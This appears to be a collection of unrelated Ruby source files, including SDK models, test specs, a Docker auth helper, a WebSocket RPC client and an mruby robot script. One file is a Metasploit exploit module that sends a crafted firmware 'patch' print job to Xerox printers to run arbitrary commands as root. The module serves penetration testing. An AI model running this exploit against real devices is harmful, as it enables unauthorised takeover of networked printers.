raise 'You cannot provide both :taxInfo and :tax_info' if attributes.key?(:'taxInfo') && attributes.key?(:'tax_info')
self.tax_info = attributes[:'tax_info'] if attributes[:'tax_info']
self.payment_options = attributes[:'paymentOptions'] if attributes[:'paymentOptions']
raise 'You cannot provide both :paymentOptions and :payment_options' if attributes.key?(:'paymentOptions') && attributes.key?(:'payment_options')
self.payment_options = attributes[:'payment_options'] if attributes[:'payment_options']
self.payment_gateway = attributes[:'paymentGateway'] if attributes[:'paymentGateway']
raise 'You cannot provide both :paymentGateway and :payment_gateway' if attributes.key?(:'paymentGateway') && attributes.key?(:'payment_gateway')
self.payment_gateway = attributes[:'payment_gateway'] if attributes[:'payment_gateway']
self.billing_address = attributes[:'billingAddress'] if attributes[:'billingAddress']
raise 'You cannot provide both :billingAddress and :billing_address' if attributes.key?(:'billingAddress') && attributes.key?(:'billing_address')
self.billing_address = attributes[:'billing_address'] if attributes[:'billing_address']
self.time_plan_upgrade = attributes[:'timePlanUpgrade'] if attributes[:'timePlanUpgrade']
raise 'You cannot provide both :timePlanUpgrade and :time_plan_upgrade' if attributes.key?(:'timePlanUpgrade') && attributes.key?(:'time_plan_upgrade')
self.time_plan_upgrade = attributes[:'time_plan_upgrade'] if attributes[:'time_plan_upgrade']
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Custom attribute writer method checking allowed values (enum).
# @param [Object] plan_type Object to be assigned
def plan_type=(plan_type)
# rubocop:disable Style/ConditionalAssignment
if plan_type && !PLAN_TYPE_ENUM.include?(plan_type)
OCI.logger.debug("Unknown value for 'plan_type' [" + plan_type + "]. Mapping to 'PLAN_TYPE_UNKNOWN_ENUM_VALUE'") if OCI.logger
@plan_type = PLAN_TYPE_UNKNOWN_ENUM_VALUE
else
@plan_type = plan_type
end
# rubocop:enable Style/ConditionalAssignment
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] upgrade_state Object to be assigned
def upgrade_state=(upgrade_state)
# rubocop:disable Style/ConditionalAssignment
if upgrade_state && !UPGRADE_STATE_ENUM.include?(upgrade_state)
OCI.logger.debug("Unknown value for 'upgrade_state' [" + upgrade_state + "]. Mapping to 'UPGRADE_STATE_UNKNOWN_ENUM_VALUE'") if OCI.logger
@upgrade_state = UPGRADE_STATE_UNKNOWN_ENUM_VALUE
else
@upgrade_state = upgrade_state
end
# rubocop:enable Style/ConditionalAssignment
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] upgrade_state_details Object to be assigned
def upgrade_state_details=(upgrade_state_details)
# rubocop:disable Style/ConditionalAssignment
if upgrade_state_details && !UPGRADE_STATE_DETAILS_ENUM.include?(upgrade_state_details)
OCI.logger.debug("Unknown value for 'upgrade_state_details' [" + upgrade_state_details + "]. Mapping to 'UPGRADE_STATE_DETAILS_UNKNOWN_ENUM_VALUE'") if OCI.logger
@upgrade_state_details = UPGRADE_STATE_DETAILS_UNKNOWN_ENUM_VALUE
else
@upgrade_state_details = upgrade_state_details
end
# rubocop:enable Style/ConditionalAssignment
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
id == other.id &&
subscription_plan_number == other.subscription_plan_number &&
plan_type == other.plan_type &&
time_start == other.time_start &&
ship_to_cust_acct_site_id == other.ship_to_cust_acct_site_id &&
ship_to_cust_acct_role_id == other.ship_to_cust_acct_role_id &&
bill_to_cust_account_id == other.bill_to_cust_account_id &&
is_intent_to_pay == other.is_intent_to_pay &&
currency_code == other.currency_code &&
gsi_org_code == other.gsi_org_code &&
language_code == other.language_code &&
organization_id == other.organization_id &&
upgrade_state == other.upgrade_state &&
upgrade_state_details == other.upgrade_state_details &&
tax_info == other.tax_info &&
payment_options == other.payment_options &&
payment_gateway == other.payment_gateway &&
billing_address == other.billing_address &&
time_plan_upgrade == other.time_plan_upgrade
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[id, subscription_plan_number, plan_type, time_start, ship_to_cust_acct_site_id, ship_to_cust_acct_role_id, bill_to_cust_account_id, is_intent_to_pay, currency_code, gsi_org_code, language_code, organization_id, upgrade_state, upgrade_state_details, tax_info, payment_options, payment_gateway, billing_address, time_plan_upgrade].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 45.619565 | 340 | 0.713367 |
38f18f4809c96f8c549c8b10efcf762fdd3cd141 | 2,708 | #!mruby
#Ver.2.27
#TB6612FNG L-L->STOP. L-H->CCW, H-L->CW, H-H->ShortBrake
MaxVero = 120
Rottime = 1500
Vero = [4,10]
Num = [18,3,15,14]
Lev = [0,16]
Sens = 17 #γ’γγγ°θ·ι’γ»γ³γ΅
Usb = Serial.new(0)
for i in Num do
pinMode(i, OUTPUT)
end
for i in Lev do
pinMode(i, 2) #γγ«γ’γγ
end
#-------
# γ¬γγΌηΆζ
ηΆζ
γεεΎγγΎγ
#-------
def lever()
digitalRead(Lev[0]) + 2 * digitalRead(Lev[1])
end
#-------
# γΏγ³γ―γζ’γγΎγ
#-------
def mstop()
digitalWrite(Num[0],LOW) #A1
digitalWrite(Num[1],LOW) #A2
digitalWrite(Num[2],LOW) #B1
digitalWrite(Num[3],LOW) #B2
end
#-------
# γΏγ³γ―ει²γγγΎγ
#-------
def mstart()
p = 0
# digitalWrite(Num[0],HIGH) #A1
# digitalWrite(Num[1],LOW) #A2
# digitalWrite(Num[2],HIGH) #B1
# digitalWrite(Num[3],LOW) #B2
digitalWrite(Num[0],LOW) #A1
digitalWrite(Num[1],HIGH) #A2
digitalWrite(Num[2],LOW) #B1
digitalWrite(Num[3],HIGH) #B2
MaxVero.times do
delay 5
pwm(Vero[0], p)
pwm(Vero[1], p)
p += 1
end
end
#-------
# γΏγ³γ―γγt msεθ»’γγγΎγ
#-------
def rot(r0,r1,t)
led HIGH
p = 0
digitalWrite(Num[0],r0) #A1
digitalWrite(Num[1],r1) #A2
digitalWrite(Num[2],r1) #B1
digitalWrite(Num[3],r0) #B2
MaxVero.times do
delay 5
pwm(Vero[0], p)
pwm(Vero[1], p)
p += 1
end
delay t
MaxVero.times do
delay 5
pwm(Vero[0], p)
pwm(Vero[1], p)
p -= 1
end
end
#-----------------------------------------
if(lever == 0)then
System.exit
end
Usb.println("System Start")
cons = [0,0,0,0] #front,left,right,break
moveFlg = 0
cnt = 0
k = 1
while true do
lvr = lever
sc = cons[lvr] + 1
for i in 0..3 do
if cons[i] == 4 then
if(i == 0)then
if(moveFlg != 1)then
moveFlg = 1
Usb.println "Start"
mstart
elsif moveFlg != 0 then
moveFlg = 0
Usb.println "STOP"
mstop
end
elsif i == 1 then
Usb.println "Left Rotation"
rot(LOW, HIGH, Rottime)
if(moveFlg == 1)then
mstart
else
mstop
end
elsif i == 2 then
Usb.println "Right Rotation"
rot(HIGH, LOW, Rottime)
if(moveFlg == 1)then
mstart
else
mstop
end
end
end
cons[i] = 0
end
cons[lvr] = sc
#Usb.println cnt.to_s
5.times do
delay 50
if(analogRead(Sens) > 420)then
moveFlg = 0
Usb.println "STOP"
mstop
break
end
end
if lvr != 3 then
if cnt > 6 then break end
cnt += 1
else
cnt = 0
end
led k
k = 1 - k
end
pwm(Vero[0], 0)
pwm(Vero[1], 0)
digitalWrite(Num[0],HIGH)
digitalWrite(Num[1],HIGH)
digitalWrite(Num[2],HIGH)
digitalWrite(Num[3],HIGH)
| 17.248408 | 56 | 0.534712 |
6a046982bef4728ce74796a4bcd4f1d3bf3e85ba | 390 | # encoding: utf-8
require 'spec_helper'
require "logstash/filters/sig"
describe LogStash::Filters::Sig do
describe "Set to Hello World" do
let(:config) do <<-CONFIG
filter {
sig {
message => "Hello World"
}
}
CONFIG
end
sample("message" => "some text") do
expect(subject.get("message")).to eq('Hello World')
end
end
end
| 18.571429 | 57 | 0.587179 |
ed76c911f91757436a2d6197a2554984edcfbd45 | 3,434 | require 'rails_helper'
describe "upload UntaggedAnimalAssessment category", type: :feature do
let(:user) { create(:user) }
let(:valid_file) { "#{Rails.root}/db/sample_data_files/untagged_animal_assessment/Untagged_assessment_03122018.csv" }
let(:invalid_file) { "#{Rails.root}/spec/support/csv/invalid_headers.csv" }
let(:incomplete_data_file) { "#{Rails.root}/spec/support/csv/Untagged_assessment_03122018-invalid-rows.csv" }
let(:expected_success_message) { 'Successfully queued spreadsheet for import' }
let(:temporary_file) { create(:temporary_file, contents: File.read(valid_file)) }
before do
sign_in user
visit new_file_upload_path
end
context 'when user successfully uploads a CSV with no errors' do
it "creates new ProcessedFile record with 'Processed' status " do
upload_file("Untagged Animal Assessment", valid_file)
processed_file = ProcessedFile.last
expect(ProcessedFile.count).to eq 1
expect(processed_file.status).to eq "Processed"
expect(processed_file.job_errors).to eq(nil)
expect(processed_file.job_stats).to eq(
{ "row_count"=>250,
"rows_imported"=>250,
"shl_case_numbers" => {"SF16-9A"=>50, "SF16-9B"=>50, "SF16-9C"=>50, "SF16-9D"=>50, "SF16-9E"=>50},
}
)
expect(page).to have_content expected_success_message
end
end
context 'when user uploads a CSV with invalid headers' do
it "creates new ProcessedFile record with 'Failed' status" do
upload_file("Untagged Animal Assessment", invalid_file)
processed_file = ProcessedFile.last
expect(ProcessedFile.count).to eq 1
expect(processed_file.status).to eq "Failed"
expect(processed_file.job_errors).to eq "Does not have valid header(s). Data not imported!"
expect(processed_file.job_stats).to eq({})
expect(page).to have_content expected_success_message
end
end
context 'when user upload a CSV that has been already processed' do
before do
FactoryBot.create :processed_file,
filename: 'Untagged_assessment_03122018.csv',
category: 'Untagged Animal Assessment',
status: 'Processed',
temporary_file_id: temporary_file.id
end
it "creates new ProcessedFile record with 'Failed' status" do
upload_file("Untagged Animal Assessment", valid_file)
processed_file = ProcessedFile.where(status: "Failed").first
expect(ProcessedFile.count).to eq 2
expect(processed_file.job_errors).to eq "Already processed a file on #{processed_file.created_at.strftime('%m/%d/%Y')} with the same name: Untagged_assessment_03122018.csv. Data not imported!"
expect(processed_file.job_stats).to eq({})
expect(page).to have_content expected_success_message
end
end
context 'when user upload file with invalid rows' do
it "creates new ProcessedFile record with 'Failed' status" do
upload_file("Untagged Animal Assessment", incomplete_data_file)
processed_file = ProcessedFile.last
expect(ProcessedFile.count).to eq 1
expect(processed_file.status).to eq "Failed"
expect(processed_file.job_errors).to eq("Does not have valid row(s). Data not imported!")
expect(processed_file.job_stats).to eq({"row_number_2"=>{"cohort"=>[{"error"=>"blank"}]}, "row_number_3"=>{"growout_rack"=>[{"error"=>"blank"}]}})
expect(page).to have_content expected_success_message
end
end
end
| 42.925 | 198 | 0.714619 |
1d82dc968a327638f7266aaf51f43954024f79ff | 2,448 | # Frozen-string-literal: true
# Copyright: 2015 - 2016 Jordon Bedwell - Apache v2.0 License
# Encoding: utf-8
require "open3"
require "json"
module Docker
module Template
class Auth
DEFAULT_SERVER = "https://index.docker.io/v1/"
def initialize(repo)
@repo = repo
end
def auth_with_cmd?
@repo.user =~ %r!/!
end
def auth_with_env?
ENV.key?("DOCKER_USERNAME") && \
ENV.key?("DOCKER_PASSWORD") && \
ENV.key?("DOCKER_EMAIL")
end
# --
def auth(skip: nil)
return auth_from_cmd if auth_with_cmd? && skip != :cmd
return auth_from_env if auth_with_env? && skip != :env
auth_from_config
# Wrap around their error to create ours.
rescue Docker::Error::AuthenticationError
raise Error::UnsuccessfulAuth
# Something went wrong?
end
# --
def auth_from_cmd
case @repo.user
when %r!^gcr\.io/! then auth_from_gcr
else
auth({
skip: :cmd
})
end
end
# --
def auth_from_env
Docker.authenticate!({
"username" => ENV["DOCKER_USERNAME"],
"serveraddress" => ENV["DOCKER_SERVER"] || DEFAULT_SERVER,
"password" => ENV["DOCKER_PASSWORD"],
"email" => ENV["DOCKER_EMAIL"]
})
end
# --
def auth_from_config
cred = Pathutil.new("~/.docker/config.json")
cred = cred.expand_path.read_json
unless cred.empty?
cred["auths"].each do |server, info|
next if info.empty?
user, pass = Base64.decode64(info["auth"]).split(":", 2)
Docker.authenticate!({
"username" => user,
"serveraddress" => server,
"email" => info["email"],
"password" => pass
})
end
end
end
private
def auth_from_gcr
i, o, e, = Open3.popen3("docker-credential-gcr get")
server, = @repo.user.split("/", 2)
i.puts server; i.close
val = JSON.parse(o.read.chomp)
[o, e].map(&:close)
if val
Docker.authenticate!({
"serveraddress" => server,
"username" => val["Username"],
"email" => "[email protected]",
"password" => val["Secret"],
})
end
end
end
end
end
| 24.48 | 68 | 0.52165 |
877e62b4200d684040bb74152aae7cadb3644d8f | 1,437 | module Intrigue
module Ident
module Check
class Kong < Intrigue::Ident::Check::Base
def generate_checks(url)
[
{
type: "fingerprint",
category: "service",
tags: ['Networking', 'Proxy', 'API'],
vendor: "Kong",
product:"Kong",
description:"server header",
version: nil,
match_logic: :all,
matches: [
{
match_type: :content_headers,
match_content: /^server: kong\/[\d\.]+/i,
}
],
references: [],
dynamic_version: lambda { |x|
_first_header_capture(x,/^server: kong\/([\d\.]+)/i)
},
paths: [ { path: "#{url}", follow_redirects: true } ],
inference: true
},
#
{
type: "fingerprint",
category: "service",
tags: ['Networking', 'Proxy', 'API'],
vendor: "Kong",
product:"Kong",
description:"no match body",
version: nil,
references: [],
match_logic: :all,
matches: [
{
match_type: :content_body,
match_content: /^\{\"message\"\:\"no Route matched with those values\"\}/i,
}
],
paths: [ { path: "#{url}", follow_redirects: true } ],
inference: true
},
]
end
end
end
end
end
| 24.775862 | 89 | 0.448156 |
7976dffb8d12a71c3ab9b880fb0a6792697e79b8 | 8,150 | require_relative './json_rpc'
require_relative './subscription'
require 'websocket-eventmachine-client'
module Graphene
module RPC
#
# API 0: stateless apis called via rpc instance (id = 0)
# API 1: login and get api calls (id = 1), return varrious API ids
# API n: access various api with their according id (id = n)
#
# all unexplicated defined methods are caught by method_missing method
# in format like below
#
# func_name({api_id:id, params:[param1, param2], callback: callback_func})
#
class WebSocketRpc < JsonRpc
include Graphene::RPC::Subscription
def initialize(api_uri, username, password, options = {})
@username = username
@password = password
# request map
@requests = {}
# api_ids map
@api_ids = {}
# setup some shorthand func
%w(database network_broadcast network_node history).each do |name|
instance_eval "def #{name}_id; return instance_variable_get('@api_ids').values_at('#{name}').first; end"
end
super(api_uri, username, password, options)
end
# override and do nothing
# connection setup is moved to connect method
def init_connection(url, username, password); end
def connect
if @uri.scheme == 'https' || @uri.scheme == 'wss'
@uri.scheme = 'https'; rpc_uri = @uri.to_s
@uri.scheme = 'wss'; ws_uri = @uri.to_s
else
@uri.scheme = 'http'; rpc_uri = @uri.to_s
@uri.scheme = 'ws'; ws_uri = @uri.to_s
end
log.debug { "connect to: #{@uri.to_s}"}
# setup rpc connection for sync call
@rpc = JsonRpc.new(rpc_uri, @username, @password, @options)
# setup ws connection for async call
@conn = ::WebSocket::EventMachine::Client.connect(uri: ws_uri)
@conn.onopen { onopen }
@conn.onmessage { |msg, type| onmessage(msg, type) }
@conn.onclose { |code, reason| onclose(code, reason) }
end
def get_account(name_or_id)
if is_object_id?(name_or_id)
(rpc_exec 'get_objects', [name_or_id])[0]
else
(rpc_exec 'get_account_by_name', name_or_id)[0]
end
end
def get_asset(name_or_id)
if is_object_id?(name_or_id)
(rpc_exec 'get_objects', [name_or_id])[0]
else
(rpc_exec 'lookup_asset_symbols', [name_or_id])[0]
end
end
def is_object_id?(param)
param.split('.').length == 3
end
# async call using rpc
# only accessible to API 0 cateogory calls (stateless calls)
def rpc_exec(method, args)
@rpc.send method, args
end
# connection established
# now start do stuffs
# login
# subscribe to apis
#
def onopen
log.info { "onopen" }
login({ params: [@username, @password], api_id: 1, callback: self.method(:onlogin) })
end
# login
def onlogin(resp)
if resp[:result]
log.info {"Login Success"}
get_api_ids
else
log.info {"Login Failed"}
raise Unauthorized, "Login Failed"
end
end
# register and fetch remote id for each api
def get_api_ids
cb = {api_id: 1, callback: self.method(:on_get_api_id)}
database(cb)
history(cb)
network_broadcast(cb)
# this by default is disabled by api-access.json
# we don't need it normally
# network_node(cb)
end
# fill api_ids map
def on_get_api_id(resp)
req_id = resp[:id]
api_name = @requests[req_id.to_s][:request][:params][1]
@api_ids[api_name.downcase.to_s] = resp[:result]
puts @api_ids
if api_name == "database"
subscribe_to_objects
# subscribe_to_accounts(["init0", "init2"], true)
# subscribe_to_accounts(["1.2.100", "1.2.102"], true)
# subscribe_to_pending_transactions
# subscribe_to_future_block("191125")
subscribe_to_market('1.3.0', '1.3.660')
# EM.add_timer(5) do
# cancel_all_subscriptions
# end
end
end
# given api name and return id
def api_id(api_name)
@api_ids[api_name.downcase.to_s]
end
def onmessage(msg, type)
log.info { "receive: #{msg} [#{type}]" }
response = JSON.parse(msg, symbolize_names: true)
request_id = response[:id].to_s
method_id = response[:method].to_s
log.debug { response[:error] } if response[:error]
# after subscribing, response returns a null result
# don't need to go futher down
return if response[:result].nil?
# normal interaction will include request_id
# otherwise it's notice
if request_id.present?
req = @requests[request_id]
# callback
if req && cb = req[:callback]
# cb[:response] = response
cb.call(response)
else
# just drop it
log.debug {"Foreign Response ID: no callback defined"}
end
# Run registered call backs for individual object notices
elsif method_id.present?
puts "notice"
# on_subscribe_callback(response)
end
end
#
# @options[Object]: {api_id, params}
#
# @exmaple:
# request(login, {params: ['user', 'password'], api_id: 1, callback: self.onlogin})
#
def request(method, options = [])
# binding.pry if method == 'get_full_accounts'
# options = options.length == 1 ? options[0] : options
req_id = call_id.to_s
api_id = options[:api_id] || 1
req = {
request: {
id: req_id,
method: "call",
params: [api_id, method, options[:params] || []]
},
callback: options[:callback]
}
@requests[req_id] = req
EM.next_tick do
log.info { "send: #{req[:request]}" }
@conn.send JSON.dump(req[:request])
end
end
def method_missing(name, *args)
if args.length > 1
params = args
else
params = args[0]
end
params = { params: params.is_a?(Array) ? params : [params] } unless params.is_a? Hash
params = { api_id: 1 }.merge(params)
request(name.to_s, params )
end
# clean up logic goes here
def onclose(code, reason)
log.info { "disconnected with status code: #{code}" }
EM.stop
end
def log_level
:debug
end
# subscription handle
# we use call_id to present subscription handle
# it will increase automatically
# with each specific subscribe call
# call_id = identfier + 1
# because internal counter is auto incremented
def identifier
call_id
end
end
end
end
if $0 == __FILE__
$:.unshift( File.expand_path("../../..", __FILE__) )
require 'graphene'
require 'graphene/rpc'
require 'graphene/rpc/json_rpc'
# require 'eventmachine'
class KeyboardHandler < EM::Connection
include EM::Protocols::LineText2
attr_reader :ws
def initialize(ws)
puts "keyboard inited"
@ws = ws
end
def receive_data(data)
puts "data: #{data}"
end
def receive_line(data)
puts "line: #{data}"
@ws.send data
end
end
module KH
def receive_data data
puts ">#{data}"
end
end
puts "Graphene WebSocketRpc test.."
begin
# EM.epoll
EM.run do
# trap("TERM") { stop }
# trap("INT") { stop }
wsrpc = Graphene::RPC::WebSocketRpc.new('ws://127.0.0.1:8099', 'user', 'pass', nolog: false)
wsrpc.connect
# EM.open_keyboard(KeyboardHandler, wsrpc)
# EM.open_keyboard(KH)
end
rescue Graphene::RPC::WebSocketRpc::Error => e
puts "error occured"
puts e.class
puts e
rescue Exception => e
puts "Uncaptured"
puts e.class
puts e.backtrace
end
end | 25.628931 | 114 | 0.573129 |
39020f5b951309fbcbe6ad216f3051686d29fa83 | 196 | require "application_system_test_case"
class HostsTest < ApplicationSystemTestCase
# test "visiting the index" do
# visit hosts_url
#
# assert_selector "h1", text: "Host"
# end
end
| 19.6 | 43 | 0.719388 |
011ecd8f6ee2b5c54ce5128e37c8751d1c2ed683 | 291 | module Steps
module Opening
class ResearchConsentController < Steps::OpeningStepController
def edit
@form_object = ResearchConsentForm.build(current_c100_application)
end
def update
update_and_advance(ResearchConsentForm)
end
end
end
end
| 20.785714 | 74 | 0.71134 |
38735fbbeea3bf12c486c17a3ed32b3554bc657e | 4,350 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability',
'Description' => %q{
This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By
supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary
commands under root privileges.
},
'Author' =>
[
'Deral "Percentx" Heiland',
'Pete "Bokojan" Arzamendi'
],
'References' =>
[
['BID', '52483'],
['URL', 'http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf'],
['URL', 'http://foofus.net/goons/percx/Xerox_hack.pdf']
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp'
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => 'Mar 07 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9100)
])
end
def exploit
print_status("#{rhost}:#{rport} - Sending print job...")
firmcode = '%%XRXbegin' + "\x0A"
firmcode << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A"
firmcode << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A"
firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{payload.encoded}" + ':"' + "\x0A"
firmcode << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0A"
firmcode << '%%OID_ATT_DLM_NAME "xerox"' + "\x0A"
firmcode << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0A"
firmcode << '%%OID_ATT_DLM_SIGNATURE "ca361047da56db9dd81fee6a23ff875facc3df0e1153d325c2d217c0e75f861b"' + "\x0A"
firmcode << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0A"
firmcode << '%%XRXend' + "\x0A\x1F\x8B\x08\x00\xB1\x8B\x49\x54\x00\x03\xED"
firmcode << "\xD3\x41\x4B\xC3\x30\x14\x07\xF0\x9E\xFB\x29\xFE\xE2\x60\x20\x74"
firmcode << "\x69\x63\x37\x61\x5A\xBC\x79\x94\xDD\x3C\xC8\xA0\x59\x9B\xDA\x4A"
firmcode << "\xD7\xCC\xB4\xD3\x1D\xF6\xE1\x8D\xDD\x64\xB8\x83\x3B\x0D\x11\xFE"
firmcode << "\xBF\x43\x03\xAF\x2F\xEF\xBD\xB4\x64\xA3\xAD\xD9\x8C\xDA\xD2\x3B"
firmcode << "\xA3\xD0\xB9\x19\x8F\xFB\xD5\x39\x5E\xC3\x58\x4E\xBC\x48\xC6\x52"
firmcode << "\x5E\x87\xE3\x89\x8C\xBD\x30\x8A\xE4\x44\x7A\x08\xCF\x39\xD4\xB7"
firmcode << "\x75\xDB\x29\x0B\x78\xD6\x98\xEE\xB7\xBC\x53\xEF\xFF\xA9\xCB\x0B"
firmcode << "\xB1\xA8\x1A\xB1\x50\x6D\xE9\x17\x55\x9D\xA4\x2F\x56\xAF\x10\xD4"
firmcode << "\x08\x1E\x30\x9C\x59\xA5\x73\x35\x7B\x7A\x94\x61\x14\x0F\x21\xDE"
firmcode << "\x95\x15\xED\xCA\x98\x5A\x34\x99\x68\x74\x27\x5E\xCD\x62\x7A\x35"
firmcode << "\x8A\x52\xBF\x2A\xF0\x8C\xA0\xC0\xC0\xD5\xC0\xDC\xEF\x4A\xDD\xF8"
firmcode << "\xC0\x47\x59\xD5\x1A\x56\xAB\x1C\x75\xD5\x68\x17\xC9\x8D\x7B\x00"
firmcode << "\x3A\x2B\x0D\x06\x5F\x31\x6C\xB1\xEB\xF8\x06\xFC\x68\xD7\xE7\xF5"
firmcode << "\x65\x07\xF7\x48\x12\x84\x98\xDF\x62\x5F\x17\xC8\xCC\x72\xA9\x9A"
firmcode << "\x3C\x49\x0F\x95\xB6\xD9\xBA\x43\x90\x4F\xDD\x18\x32\xED\x93\x8A"
firmcode << "\xAA\xEF\xE8\x9A\xDC\xF5\x83\xF9\xBB\xE4\xFD\xDE\xED\xE1\xE0\x76"
firmcode << "\x89\x91\xD8\xEC\x6F\x82\xFB\x0C\xFE\x5F\xFF\x15\x22\x22\x22\x22"
firmcode << "\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\xA2\xD3\x3E"
firmcode << "\x01\x5A\x18\x54\xBB\x00\x28\x00\x00"
begin
connect
sock.put(firmcode)
handler
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
print_error("#{rhost}:#{rport} - #{e.message}")
ensure
disconnect
end
end
end
| 45.3125 | 130 | 0.617701 |
acb475e92ab718531b3af74a9c7f76d89313b829 | 6,441 | require 'spec_helper'
describe "Keepalive" do
let(:config) do
{
:shared_memory_size => '256m',
:keepalive_requests => 500,
:header_template => '',
:message_template => '~text~',
:footer_template => '',
:publisher_mode => 'admin'
}
end
it "should create many channels on the same socket" do
channel = 'ch_test_create_many_channels_'
body = 'channel started'
channels_to_be_created = 4000
nginx_run_server(config, :timeout => 25) do |conf|
http_single = Net::HTTP::Persistent.new "single_channel"
http_double = Net::HTTP::Persistent.new "double_channel"
uri = URI.parse nginx_address
0.step(channels_to_be_created - 1, 500) do |i|
1.upto(500) do |j|
post_single = Net::HTTP::Post.new "/pub?id=#{channel}#{i + j}"
post_single.body = body
response_single = http_single.request(uri, post_single)
expect(response_single.code).to eql("200")
expect(response_single.body).to eql(%({"channel": "#{channel}#{i + j}", "published_messages": 1, "stored_messages": 1, "subscribers": 0}\r\n))
post_double = Net::HTTP::Post.new "/pub?id=#{channel}#{i + j}/#{channel}#{i}_#{j}"
post_double.body = body
response_double = http_double.request(uri, post_double)
expect(response_double.code).to eql("200")
expect(response_double.body).to match_the_pattern(/"hostname": "[^"]*", "time": "\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}", "channels": #{(i + j) * 2}, "wildcard_channels": 0, "uptime": [0-9]*, "infos": \[\r\n/)
expect(response_double.body).to match_the_pattern(/"channel": "#{channel}#{i + j}", "published_messages": 2, "stored_messages": 2, "subscribers": 0},\r\n/)
expect(response_double.body).to match_the_pattern(/"channel": "#{channel}#{i}_#{j}", "published_messages": 1, "stored_messages": 1, "subscribers": 0}\r\n/)
end
end
end
end
it "should create many channels on the same socket without info on response" do
channel = 'ch_test_create_many_channels_'
body = 'channel started'
channels_to_be_created = 4000
nginx_run_server(config.merge({:channel_info_on_publish => "off"}), :timeout => 25) do |conf|
uri = URI.parse nginx_address
0.step(channels_to_be_created - 1, 500) do |i|
http = Net::HTTP::Persistent.new
1.upto(500) do |j|
post = Net::HTTP::Post.new "/pub?id=#{channel}#{i + j}"
post.body = body
response = http.request(uri, post)
expect(response.code).to eql("200")
expect(response.body).to eql("")
end
end
end
end
it "should execute different operations using the same socket" do
channel = 'ch_test_different_operation_with_keepalive'
content = 'message to be sent'
nginx_run_server(config) do |conf|
socket = open_socket(nginx_host, nginx_port)
headers, body = get_in_socket("/pub", socket)
expect(body).to eql("")
expect(headers).to include("No channel id provided.")
headers, body = post_in_socket("/pub?id=#{channel}", content, socket, {:wait_for => "}\r\n"})
expect(body).to eql("{\"channel\": \"#{channel}\", \"published_messages\": 1, \"stored_messages\": 1, \"subscribers\": 0}\r\n")
headers, body = get_in_socket("/channels-stats", socket)
